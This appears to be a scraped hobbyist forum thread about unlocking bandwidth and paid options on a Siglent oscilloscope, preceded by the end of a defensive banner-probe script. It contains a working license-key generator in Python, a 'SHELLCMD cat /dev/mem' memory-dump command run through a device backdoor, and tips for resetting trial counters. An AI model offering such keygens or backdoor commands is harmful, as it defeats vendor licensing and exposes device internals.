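        elif raw[i + 1] == IAC:          # escaped literal 0xFF
            out.append(IAC)
            i += 2
        elif raw[i + 1] in NEGOTIATION:  # IAC <verb> <option>
            i += 3
        elif raw[i + 1] == SB:           # subnegotiation runs until IAC SE
            end = raw.find(bytes([IAC, SE]), i + 2)
            i = n if end < 0 else end + 2
        else:                            # other two-byte command (NOP, GA, ...)
            i += 2
    return bytes(out)


def classify_banner(raw: bytes) -> str:
    """Return 'auth-required', 'open-shell' or 'unknown' for a connect banner."""
    text = strip_telnet(raw).replace(b"\x00", b"").rstrip(b"\r\n")
    if AUTH_RE.search(text):
        return "auth-required"
    if SHELL_RE.search(text):
        return "open-shell"
    return "unknown"


def probe(host: str, port: int = 9999, timeout: float = 3.0) -> str:
    """Connect, read the banner without sending anything, and classify it."""
    data = b""
    try:
        with socket.create_connection((host, port), timeout=timeout) as s:
            s.settimeout(timeout)
            try:
                while len(data) < 4096:
                    chunk = s.recv(1024)
                    if not chunk:
                        break
                    data += chunk
            except OSError:              # read timeout or reset: keep what we have
                pass
    except OSError:
        return "closed"
    return classify_banner(data)


if __name__ == "__main__":
    if len(sys.argv) > 1:                # addresses of your own instruments
        for host in sys.argv[1:]:
            print(host, probe(host))
    else:                                # offline demo on the constructed samples
        print("open sample :", classify_banner(SAMPLE_OPEN_SHELL))
        print("login sample:", classify_banner(SAMPLE_LOGIN))
```

A result of `open-shell` on an instrument means the daemon should be stopped and the page that starts it removed before the device goes back on a shared network.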

Offline physicsmajor

  • Newbie
  • Posts: 2
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #169 on: April 29, 2020, 12:41:05 am »
Recently received a SDS1104X-E, arrived with .33 firmware.  No downgrading or firmware dump necessary.

Small correction to aimc's post which is largely a great guide above https://www.eevblog.com/forum/testgear/sds1104x-e-hack-to-200mhz-and-full-options/msg2783212/#msg2783212

When using LCISL the format is "LCISL OPTION,KEYXXXXXXXXXXXX" - note the comma!  A space between option and the key does not take.  This is probably why changing bandwidth worked for above poster 5370H55V but the options did not.  Use this format and you can do everything over the network.  I did not get a handshake back over SCPI for the options, just "command sent successfully", but they were immediately permanently activated on the scope.

After generating your keys, recommend the first SCPI command should be "MBCD?" - this queries the scope and returns the key generated named "100M".  If your generated key for 100M matches what the scope returned, all of the keys are good.  If not, you need to double check your SN/SCOPEID in the Python script; none will work if the built-in 100M doesn't match.  If you ever need to revert to 100Mhz bandwidth (warranty service or whatever), that key will do it.
« Last Edit: April 29, 2020, 12:44:06 am by physicsmajor »
 

Offline Ringmodulator

  • Regular Contributor
  • *
  • Posts: 67
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #170 on: April 30, 2020, 01:41:25 pm »
Hi,

is there a way to deactivate option keys?

Just in case it is necessary to return the unit for warranty...

Chris
 

Offline 705jas

  • Newbie
  • Posts: 3
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #171 on: May 03, 2020, 11:46:07 am »
Hi All

Sorry if this has been asked before (couldn't find it?) but I have successfully done the bandwidth upgrade on my 1104x (.26 firmware) but just wondering if you are still able to do firmware upgrades after this hack?

Thanks in advance.
 

Offline Nikolas

  • Newbie
  • Posts: 2
  • Country: at
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #172 on: May 05, 2020, 04:06:27 pm »
Hey guys, I'm thinking about buying the SDS1104X-E, does anyone know if this still works on the current firmware 6.1.35R2 (Release Date 03.07.20)?

Thanks
« Last Edit: May 05, 2020, 05:39:16 pm by Nikolas »
 

Offline spy

  • Contributor
  • Posts: 6
  • Country: pl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #173 on: May 05, 2020, 11:28:46 pm »
@Nikolas just follow the guide. No worries.

@705jas yes you are.

@Ringmodulator yes it is possible but why would you like to do this? Besides, only option worth activation is a WiFi with purchasing a TP-Link dongle on-line. AWG and MSO options require additional hardware to be purchased in order to use them.
 

Offline Ringmodulator

  • Regular Contributor
  • *
  • Posts: 67
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #174 on: May 07, 2020, 12:40:48 pm »
@Ringmodulator yes it is possible but why would you like to do this? Besides, only option worth activation is a WiFi with purchasing a TP-Link dongle on-line. AWG and MSO options require additional hardware to be purchased in order to use them.

@spy,
just in case, one has to send his unit back for warranty and wants to remove an unofficial key/option upfront.

 

Offline Ringmodulator

  • Regular Contributor
  • *
  • Posts: 67
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #175 on: May 14, 2020, 04:49:17 pm »
WIFI BUG

in case, your WIFI SSID contains a space character, the scope will automatically find the network with this SSID and you can choose it.
So, this looks just fine.

But the scope will not connect to the network and will not get an IP assigned.

As soon, as you rename the network with a SSID, that has no space in the name, everything is OK.

Verified with FW 6.1.33, not checked with 6.1.35R2

So check your SSID, before blaming the WLAN dongle.

Chris
 

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #176 on: May 14, 2020, 07:10:42 pm »
WIFI BUG

in case, your WIFI SSID contains a space character, the scope

Chris, this is not scope bug, it is wifi implementation. Actually lot of devices can't connect to SSID containing space character
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 

Offline SMB784

  • Frequent Contributor
  • **
  • Posts: 322
  • Country: us
    • Tequity Surplus
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #177 on: May 14, 2020, 09:13:05 pm »
Chris, this is not scope bug, it is wifi implementation. Actually lot of devices can't connect to SSID containing space character

Honestly this is just false on its face. I have yet to come across a single device that cannot handle a space in the SSID. Every smart phone on Earth can handle that. $2 IoT devices from eBay have no problems with this.

This is a bug or a really, really stupid feature and it needs to be fixed.

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #178 on: May 16, 2020, 06:09:56 pm »
Every smart phone on Earth can handle that. $2 IoT devices from eBay have no problems with this.

This is a bug or a really, really stupid feature and it needs to be fixed.

i make it for you very simple

https://lmgtfy.com/?q=ssid+space+character+connection+problem

gives me 207.000.000 results. You're right, no single device on earth ever got such a problem  :o
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 

Offline Ringmodulator

  • Regular Contributor
  • *
  • Posts: 67
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #179 on: May 23, 2020, 06:46:42 pm »

Quote
@Ringmodulator yes it is possible but why would you like to do this? Besides, only option worth activation is a WiFi with purchasing a TP-Link dongle on-line. AWG and MSO options require additional hardware to be purchased in order to use them.

@spy

Do you mind to share?
 

Offline spy

  • Contributor
  • Posts: 6
  • Country: pl
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #180 on: May 29, 2020, 10:42:47 am »
Deleting the file with option key stored should do the trick. You can also reset the usage counter to 30 for each option. Just take a look at 14. and 16. from my post.
 

Offline Chris Roubis

  • Contributor
  • Posts: 21
  • Country: au
  • Chris Roubis
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #181 on: July 08, 2020, 11:41:43 am »
Just bought a SDS1104X-E and already downloaded the python-script. But I have no need for more than 100 MHz for the moment, therefore I will play around with the "upgrade" in my holiday time. For that time I can lent a good function generator and probes from my work to cross-check the advancements.

But for the first time I checked my (cheap) Feeltech FY6900/60 function generator I bought for arduino-datalogging-experiments in summer... and the signal isn't as good as I expected. For the moment I have to read these threads to get some knowledge what the nominal values should be.

And I have to look around in the threads in the forum to get some pictures of the "grounded" Signals for the oscilloscope... my low V/DIV "flatline"-readouts look some kind of noisy.

It's meant to look noisy... that's the beauty of sensitive digital oscilloscope... picks up everything an analogue doesn't.
Electricians have longer fuses
 

Offline masterx81

  • Frequent Contributor
  • **
  • Posts: 410
  • Country: it
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #182 on: July 09, 2020, 08:54:25 am »
I've read some threads about this mod, but I've not found any hardware comparison to see if the limitation is only in software/probes, or there is also something different in hardware, between the 2 models...
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #183 on: July 09, 2020, 09:28:31 am »
I've read some threads about this mod, but I've not found any hardware comparison to see if the limitation is only in software/probes, or there is also something different in hardware, between the 2 models...

Can't believe you just written that. That theme has been analyzed over-and-over again in multiple threads. You just didn't read enough.

Maybe I'll resume it for you: the HW is exactly the same.  (well, technically, one has a "label" in the screen frame that shows 200 and the other shows 100...)
 

Offline masterx81

  • Frequent Contributor
  • **
  • Posts: 410
  • Country: it
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #184 on: July 09, 2020, 10:55:07 am »
Evidently, i've missed something  |O As the threads are waaaay longs, i was searching for photos of the 2 boards, or the word "hardware"  :scared:
Thanks!
 

Offline tony359

  • Regular Contributor
  • *
  • Posts: 100
  • Country: gb
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #185 on: July 10, 2020, 03:36:22 pm »
Hi all

I've managed to set the bandwidth of my 1104 to 200Mhz (Thanks!!!) but I am unable to add the options. I tried both via SCPI and via front panel. I get "the data is invalid" on the scope when I press "Press to install".

I am using this script and the bandwidth code worked.

What am I doing wrong?

Thank you!

Edit: Gotcha.
On the Scope first you need to select the correct option as in the attached picture. THEN you input the corresponding code.
« Last Edit: July 10, 2020, 08:44:53 pm by tony359 »
 

Offline martinot

  • Regular Contributor
  • *
  • Posts: 81
  • Country: se
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #186 on: July 11, 2020, 03:53:00 pm »
WIFI BUG

in case, your WIFI SSID contains a space character, the scope

Chris, this is not scope bug, it is wifi implementation. Actually lot of devices can't connect to SSID containing space character

You mean "it is not a bug, it is a "feature"?

For the record; I have always had spaces in all my SSID's for over 20 years, and never had any problem with that (it is part of the WiFi standard), with any device.
 

Offline SMB784

  • Frequent Contributor
  • **
  • Posts: 322
  • Country: us
    • Tequity Surplus
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #187 on: July 11, 2020, 06:12:52 pm »
WIFI BUG

in case, your WIFI SSID contains a space character, the scope

Chris, this is not scope bug, it is wifi implementation. Actually lot of devices can't connect to SSID containing space character

You mean "it is not a bug, it is a "feature"?

For the record; I have always had spaces in all my SSID's for over 20 years, and never had any problem with that (it is part of the WiFi standard), with any device.

Your protests will fall on deaf ears.  I have tried to explain numerous times that this limitation is insane, and SSIDs with spaces, special characters, capital letters, etc are the norm and all I hear back is some variant of "change ur SSID LOL" or "millions of devices dont work with spaces".

This scope runs on linux.  Every linux distribution has the ability to accept spaces and special characters in the SSID. Siglent needs to fix this.  It is insane to limit this scope in such a fundamental, easily fixable way.
« Last Edit: July 11, 2020, 08:50:16 pm by SMB784 »
 

Offline pcc_37

  • Newbie
  • Posts: 2
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #188 on: July 23, 2020, 04:08:58 am »
I just wanted to thank everybody on this forum for the info on unlocking my new SDS1104X-E

Mine had been flashed b4 shipment to 35R2 and was fully up to date firmware wise.

I used the python script method and manual entry of the relevant codes via the scopes menu system to gain permanent status on each of the three OPTIONS.

The ONLY issue I had was the understanding that EACH NETWORK COMMAND NEEDED TO BE ISSUED ONE AT A TIME.
The bandwidth expansion command I found VERY particular and would not be accepted until I shut down and rebooted the scope and then upon reboot enter the specific 200M code as per the step by step guide earlier in this thread.

Anyway I can confirm it certainly works on this new firmware and unit. I am waiting for an unknown revision TPLink Wifi Dongle to test that and hope its a Golden Rev v3. I hope to get the MSO add on l8r this year to test.

Thanks again everybody
 

Offline Ringmodulator

  • Regular Contributor
  • *
  • Posts: 67
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #189 on: July 23, 2020, 08:28:43 pm »
What really annoyed me was, that the scope detected and displayed the SSID with the space character and it could be selected.
So it really did not look like the space was the problem and lead me to search everywhere else...



WIFI BUG

in case, your WIFI SSID contains a space character, the scope

Chris, this is not scope bug, it is wifi implementation. Actually lot of devices can't connect to SSID containing space character

You mean "it is not a bug, it is a "feature"?

For the record; I have always had spaces in all my SSID's for over 20 years, and never had any problem with that (it is part of the WiFi standard), with any device.

Your protests will fall on deaf ears.  I have tried to explain numerous times that this limitation is insane, and SSIDs with spaces, special characters, capital letters, etc are the norm and all I hear back is some variant of "change ur SSID LOL" or "millions of devices dont work with spaces".

This scope runs on linux.  Every linux distribution has the ability to accept spaces and special characters in the SSID. Siglent needs to fix this.  It is insane to limit this scope in such a fundamental, easily fixable way.
 

Offline pcc_37

  • Newbie
  • Posts: 2
  • Country: au
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #190 on: July 28, 2020, 12:51:14 am »
My Wi Fi dongle arrived and after setup and selection of DHCP, joining the correct SSID and entry of passkey, it joined my network just fine.

You should then observe the Classic Wifi ICON appear on the lower right corner of your display to the right of your USB drive connected icon.

Any issues you might have will be due to either the revision of the TP Link dongle OR the specific hardware of your home Access Point and the TP Link dongle.

It's a bit slow on my network but it definitely works.

Cheers
 

Offline tinhead

  • Super Contributor
  • ***
  • Posts: 1925
  • Country: 00
    • If you like my hacks, send me a donation
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #191 on: July 30, 2020, 12:07:52 am »
Every linux distribution has the ability to accept spaces and special characters in the SSID.

it must not be on Siglent side of the story, it might be as well the Linux driver. Older versions of MT7601U are affected by special character / space incompatibility, that got fixed something like 2014-2015, and Siglent is using Xilinx embedded disti (3.19.0) from that time.
I don't want to be human! I want to see gamma rays, I want to hear X-rays, and I want to smell dark matter ...
I want to reach out with something other than these prehensile paws and feel the solar wind of a supernova flowing over me.
 

Offline tv84

  • Super Contributor
  • ***
  • Posts: 2006
  • Country: pt
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #192 on: July 30, 2020, 08:29:44 am »
it must not be on Siglent side of the story, it might be as well the Linux driver. Older versions of MT7601U are affected by special character / space incompatibility, that got fixed something like 2014-2015, and Siglent is using Xilinx embedded disti (3.19.0) from that time.

That would explain the thing. Riskier to solve.
 

Offline cesc

  • Newbie
  • Posts: 1
  • Country: es
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #193 on: August 04, 2020, 04:55:17 pm »
Hi guys.

Regarding the different options for SDS1104X-E, can somebody explain what is the meaning for all of them?

There are some of them that are quite trivial (WIFI, AWG - Arbitrary Waveform Generator, MSO and 16LA are related with the Logic Analyzer function), but what about the others options? MAX, FLX, CFD, I2S, 1553 & FG. Are some of them options for the SDS1104X-E?

Thanks for your help.

 

Offline Striker

  • Contributor
  • Posts: 6
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #194 on: August 05, 2020, 11:52:42 pm »
I had no issues with the linked Python scripts and it's running wonderfully. It definitely falls short of the scopes at work but it's still quite nice and a nice step up from the 1054Z. The web interface is surprisingly fluid.

It's just a shame such a tremendously limiting wifi bug still exists. I'm planning to get a switch for my bench anyway but the wifi is nice for testing in random areas of the house. If I had actually paid for the unlock I'd be pissed.
 

Online DEV001

  • Contributor
  • Posts: 17
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #195 on: August 06, 2020, 01:32:11 am »
Hi guys.

Regarding the different options for SDS1104X-E, can somebody explain what is the meaning for all of them?

There are some of them that are quite trivial (WIFI, AWG - Arbitrary Waveform Generator, MSO and 16LA are related with the Logic Analyzer function), but what about the others options? MAX, FLX, CFD, I2S, 1553 & FG. Are some of them options for the SDS1104X-E?

Thanks for your help.

This post should help.
https://www.eevblog.com/forum/testgear/unlocking-siglent-sds1104x-e-step-by-step/msg3055026/#msg3055026
 

Offline HamNerd

  • Newbie
  • Posts: 1
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #196 on: August 07, 2020, 05:28:27 pm »
Hi Guys

I just received my new SDS1104X-E and I tried to unlock it as to the script but it did not take  my scope has the new software version 6.1.35R2. Anyone else having this problem with the new software release? Did they read these posts and fix their software? 
 

Offline fisherktm

  • Newbie
  • Posts: 1
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #197 on: August 09, 2020, 04:56:47 pm »
Hi Guys

I just received my new SDS1104X-E and I tried to unlock it as to the script but it did not take  my scope has the new software version 6.1.35R2. Anyone else having this problem with the new software release? Did they read these posts and fix their software? 


I also just picked up the SDS1104X-E with version 6.1.35R2 and initially had problems unlocking the 200 MHz BW feature using the Python script. After a couple of tries I realized the ScopeID had lower case letters and I was using uppercase letters in the Python script. Once I modified to the lower case letters, It worked just fine.  I also ordered the WiFi adapter TP-Link TL-WN725N and I confirm that works and the unlock code generated from the Python script.
This is a very nice upgrade from my Tek 2213a
« Last Edit: August 09, 2020, 04:59:09 pm by fisherktm »
 

Offline Not_Sure

  • Newbie
  • Posts: 4
  • Country: us
Thanks! Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #198 on: August 11, 2020, 02:10:13 am »
Thanks to all!! 
My new SDS1104X-E is happily upgraded: 200MHz, AWG, WIFI, MSO.

I first tried the Python script values.  They worked for AWG, WIFI, MSO.  I simply typed them into the front panel in upgrade mode.  Python script value did not work for 200MHz and the value it generated for 100MHz did not agree with what the scope reported back from MCBD? command. (I tried 3 versions of the python script posted at various "known good" places and none worked??)

After installing EasyScope and National Instruments NI-VIEW, per Siglent instructions I could run commands from both an IP address browser connection and the SCPI button (better), or NI-MAX (the name that NI-VIEW created under my Win7 start menu, worse)

I could not execute shellcmd, or connect via any interface that would allow me to execute needed cmds so I downrev'ed the Firmware to 6.1.26.  This was trivial, so was restoring to 6.1.35R2 (what came on the scope).

Once running 6.1.26 I connected to the oscilloscope with the web interface (via LAN), and used the command "SHELLCMD cat /dev/mem > /usr/bin/siglent/usr/mass_storage/U-disk0/memdump.bin" to copy  memdump.bin to USB drive.

Using a hex editor I searched....  Best for me was searching for the 100M key I read with MCBD? command.  Between the only two instances of the 100MHz key in the memdump.bin file there appeared 3, 16 character ASCII codes.  I tried the first one with MCBD command and all was well.

Verified with PRBD? command which happily responded with "200M".  At this point the System Status reports it's a SDS1204X-E as well.

Reflashed back to  6.1.35R2 and smiled.

Again thanks to all who have contributed to the understanding contained herein. 

 

Offline Coyote

  • Contributor
  • Posts: 10
  • Country: si
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #199 on: August 12, 2020, 08:02:53 am »
I have upgraded my SDS1104X-E to latest firmware from Siglent website: 6.1.35R2. Then I have followed instructions regarding python script, used an online script:  https://repl.it/repls/GainsboroAlienatedText#main.py


Code: [Select]
import hashlib

SCOPEID = '0123456789abcdef'
SN = 'SDSMMEBD3R4444'
Model = 'SDS1000X-E'
          # 'SDS1000X-E', 'SDS2000X-E', 'SDS2000X+', 'SDS5000X', 'ZODIAC-'

bwopt = ('25M', '40M', '50M', '60M', '70M', '100M', '150M', '200M', '250M', '300M', '350M', '500M', '750M', '1000M', 'MAX')
otheropt = ('AWG', 'WIFI', 'MSO', 'FLX', 'CFD', 'I2S', '1553', 'FG', '16LA')

hashkey = '5zao9lyua01pp7hjzm3orcq90mds63z6zi5kv7vmv3ih981vlwn06txnjdtas3u2wa8msx61i12ueh14t7kqwsfskg032nhyuy1d9vv2wm925rd18kih9xhkyilobbgy'

def gen(x):
    h = hashlib.md5((
        hashkey +
        (Model+'\n').ljust(32, '\x00') +
        opt.ljust(5, '\x00') +
        2*(((SCOPEID if opt in bwopt else SN) + '\n').ljust(32, '\x00')) +
        '\x00'*16).encode('ascii')
    ).digest()
    key = ''
    for b in h:
        if (b <= 0x2F or b > 0x39) and (b <= 0x60 or b > 0x7A):
            m = b % 0x24
            b = m + (0x57 if m > 9 else 0x30)
        if b == 0x30: b = 0x32
        if b == 0x31: b = 0x33
        if b == 0x6c: b = 0x6d
        if b == 0x6f: b = 0x70
        key += chr(b)
    return key.upper()

for opt in bwopt:
    print('{:5} {}'.format(opt, gen(SCOPEID)))
for opt in otheropt:
    print('{:5} {}'.format(opt, gen(SN)))

In SCPI command window I have executed SCOPEID? and replaced the SCOPEID in python script without spaces. Then I have executed *IDN? and got the serial number SDSxxxxx of the scope, also replaced the SN in Python script. Executed and got codes for 200M, AWG, MSO, WIFI . First I have inserted the 200M key in the SCPI window with : MCBD 200M_code, then restarted the DSO. I have entered the option codes directly in the scope UI. DSO accepted all of them.
 
The following users thanked this post: Sinatek

Offline Not_Sure

  • Newbie
  • Posts: 4
  • Country: us
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #200 on: August 18, 2020, 07:34:30 pm »
Just for giggles I tried the python script Coyote referenced, https://repl.it/repls/GainsboroAlienatedText#main.py and inline above, and that one generated correct 100M and 200M codes for my scope. 

I recommend anyone trying an upgrade use the above referenced python script! (as of Aug. 2020)   :-+
« Last Edit: August 18, 2020, 07:36:07 pm by Not_Sure »
 

Offline RichardM

  • Contributor
  • Posts: 22
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #201 on: October 08, 2020, 02:00:11 am »
Can you undo the 200mhz upgrade? My scope tends to become slow and unresponsive with more than 2 probes capturing data. I did not notice this issue previously when at 100mhz ?. Cheers.
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #202 on: October 08, 2020, 06:24:10 am »
Can you undo the 200mhz upgrade? My scope tends to become slow and unresponsive with more than 2 probes capturing data. I did not notice this issue previously when at 100mhz ?. Cheers.
Shouldn't affect it at all.
Suggest you press Default to clear any previous settings that might be running in the background that are possibly affecting performance.

Oh and BTW, please use the correct units MHz not milli Hertz.
Avid Rabid Hobbyist
 

Offline RichardM

  • Contributor
  • Posts: 22
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #203 on: October 08, 2020, 07:02:38 am »
Ok, thanks I will try that.

MHz it is :)
 

Offline skoehler

  • Contributor
  • Posts: 26
  • Country: de
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #204 on: October 14, 2020, 12:16:39 am »
Thinking about buying SDS1104x-e vs. SDS1204x-e. German sellers list that the former comes with PP510 probes (100MHz) while the latter comes with PP215 probes (200MHz).
Is the 200MHz hack for the SDS1104x-e even worth it without proper probes?
 

Offline rf-loop

  • Super Contributor
  • ***
  • Posts: 3483
  • Country: cn
  • Born with DLL21 in hand
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #205 on: October 14, 2020, 03:59:47 am »
Thinking about buying SDS1104x-e vs. SDS1204x-e. German sellers list that the former comes with PP510 probes (100MHz) while the latter comes with PP215 probes (200MHz).
Is the 200MHz hack for the SDS1104x-e even worth it without proper probes?

Of course it is. It really does not mean the PP510 stops at just 100MHz. The difference between PP215 and PP510 is not just a simple 1:2.

Somehow it looks like the PP215 build quality is perhaps a bit better than the PP510. But freq response... if you do not know it is a PP510 and 100MHz, then with the SDS1204X-E you do not really notice you are using 100MHz probes. (If I mark your PP510 as PP215 and you do not know I have done it... I believe in practice you would use them happily without thinking they are not OK in freq response.) Much, much more important is how you use probes. This needs knowledge and skill when working around and over 100MHz.

Also, why think only of the probes that come with the scope? If you do any kind of serious things later you need many kinds of probes, and probes are also continuously wearing.
Sometimes you may use coaxial cable for the signal... sometimes perhaps some very excellent coaxial DIY probe that has very good edge response etc. etc., which goes very far beyond 200MHz scope performance.


Look at this thread for the probe tests @Performa01 made
https://www.eevblog.com/forum/testgear/siglent-sds1104x-e-in-depth-review/msg1434665/#msg1434665



@Performa01 made test with scope  SDS1202X-E and probes



@Performa01 made tests probe itself.


Do you still think the PP510 is limiting something? It is nearly nonsense whether you get PP215 or PP510 when thinking of frequency response alone. Oh well, with the PP215 you get a GND spring... so you do not need to disturb a high freq signal or edge by using the probe's long GND wire, which is a common mistake even with low grade professionals. The probe's long GND wire is for "audio" or low HF freq signals.


« Last Edit: October 14, 2020, 04:06:09 am by rf-loop »
If practice and theory is not equal it tells that used application of theory is wrong or the theory itself is wrong.
-
Harmony OS
 

Offline aimc

  • Contributor
  • Posts: 22
  • Country: ca
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #206 on: October 15, 2020, 09:06:25 pm »
Hi guys, I just wanted to know if for the SDS1104E-X (hacked or not) an update from 6.1.33 to 6.1.35R2 gives real advantages. I read here that the bandwidth and options hacking is no problem, but is it really worth to update? There are no new features really, are there? I am also using my own AVG with WiFi remote for the Bode plot, which I fear may no longer work after...

anyone? Buehler, Buehler ...
 

Online tautech

  • Super Contributor
  • ***
  • Posts: 20468
  • Country: nz
  • Taupaki Technologies Ltd. NZ Siglent Distributor
    • Taupaki Technologies Ltd.
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #207 on: October 15, 2020, 09:31:09 pm »
Hi guys, I just wanted to know if for the SDS1104E-X (hacked or not) an update from 6.1.33 to 6.1.35R2 gives real advantages. I read here that the bandwidth and options hacking is no problem, but is it really worth to update? There are no new features really, are there? I am also using my own AVG with WiFi remote for the Bode plot, which I fear may no longer work after...

anyone? Buehler, Buehler ...
:-//
Maybe you haven't looked at the FW release notes ?
Click on them on this page:
https://int.siglent.com/download/firmwares/?ProId=12
Avid Rabid Hobbyist
 

Offline rf-loop

  • Super Contributor
  • ***
  • Posts: 3483
  • Country: cn
  • Born with DLL21 in hand
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #208 on: October 16, 2020, 03:03:55 am »
SDS1xx4X-E-Firmware-Revise-History-and-Update-Instructions.pdf

Bode plot works better with the new FW. It repairs some timing problem between generator and scope.
Rev list position 11.
Also some other improvements and a handful of bugfixes in many separate areas of the system.

And if there are problems, you have the opportunity to return to the older FW until the third party generator control software spaghetti is fixed.
« Last Edit: October 16, 2020, 03:31:49 am by rf-loop »
If practice and theory is not equal it tells that used application of theory is wrong or the theory itself is wrong.
-
Harmony OS
 

Offline xthanhn

  • Contributor
  • Posts: 9
  • Country: vn
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #209 on: November 09, 2020, 10:48:28 pm »
Every linux distribution has the ability to accept spaces and special characters in the SSID.

it must not be on Siglent side of the story, it might be as well the Linux driver. Older versions of MT7601U are affected by special character / space incompatibility, that got fixed something like 2014-2015, and Siglent is using Xilinx embedded disti (3.19.0) from that time.
Hi Mr. Tinhead. Please check your inbox. I have sent you a message to help me with a bricked DSO1062B. Thank you very much!
 

Offline sulzer

  • Newbie
  • Posts: 1
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #210 on: December 22, 2020, 01:52:57 pm »
I just received my sds1104X-E scope, firmware 6.1.35R2
Hack carried out 200mhz and all options.   :clap:
A big thank you to all for sharing
Connected via LAN, everything is fine.
Connected in wifi with the TP-Link N150 v3 key, it gets complicated.
It works as long as the SSID is visible and not hidden!
Unbelievable.
My SSID contains lowercase and uppercase, I thought the problem came from there. But no.
So for me two solutions to use WebServer remotely:
- LAN provided that I connect directly to the router and not directly to the PC.
- WiFi on condition of making visible the SSID of my network.

Siglent an update to correct this. Not great for security.
 

Offline masterx81

  • Frequent Contributor
  • **
  • Posts: 410
  • Country: it
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #211 on: December 22, 2020, 02:03:43 pm »
Almost any wifi tool can discover a hidden SSID; I find it only useful for making your life more difficult. If you really want to protect your wifi, change the password often, that is difficult enough, and MAYBE block MAC addresses (but this one can also be bypassed). It can also be turned off when it's not needed, based on a time schedule.
In any case, it needs to be fixed, but first it's better that they fix the connectivity issues while using DHCP. I like to use DHCP reservations for my network...
 

Offline SMB784

  • Frequent Contributor
  • **
  • Posts: 322
  • Country: us
    • Tequity Surplus
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #212 on: December 22, 2020, 02:09:19 pm »
Unfortunately this doesn't seem to be a priority issue for them, as this issue has been known for more than a year now.  At this point it seems to be more feature than bug, sadly.

Offline atum

  • Contributor
  • Posts: 8
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #213 on: December 29, 2020, 11:18:03 pm »
Dear all,
First of all, sorry for my English.
I have read this whole thread with attention.
I've got an SDS2304X scope with the purchased decode option.
I would like to unlock the AWG option on my scope; I know that those explanations apply to the X-E series.
I tried the "SHELLCMD" SCPI command without any success (even with the oldest firmware on the Siglent website ...), it seems that this backdoor never existed on the X series ...
I also tried this key generator without any success => https://repl.it/@wgoeo/siglent-keygen#main.py (the key generated from the serial number is rejected with a bad license key message)
Can anybody help me to hack my scope?

Thanks a lot for the help.

Atum
 

Offline masterx81

  • Frequent Contributor
  • **
  • Posts: 410
  • Country: it
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #214 on: December 31, 2020, 09:59:40 am »
Have you forked the repo? I've gone crazy before discovering that the code got without account/fork wasn't valid. And backup your original code...
 

Offline atum

  • Contributor
  • Posts: 8
  • Country: fr
Re: Siglent SDS1104X-E Hack to 200Mhz, and full options ?
« Reply #215 on: December 31, 2020, 02:21:16 pm »
Thanks a lot for your response.
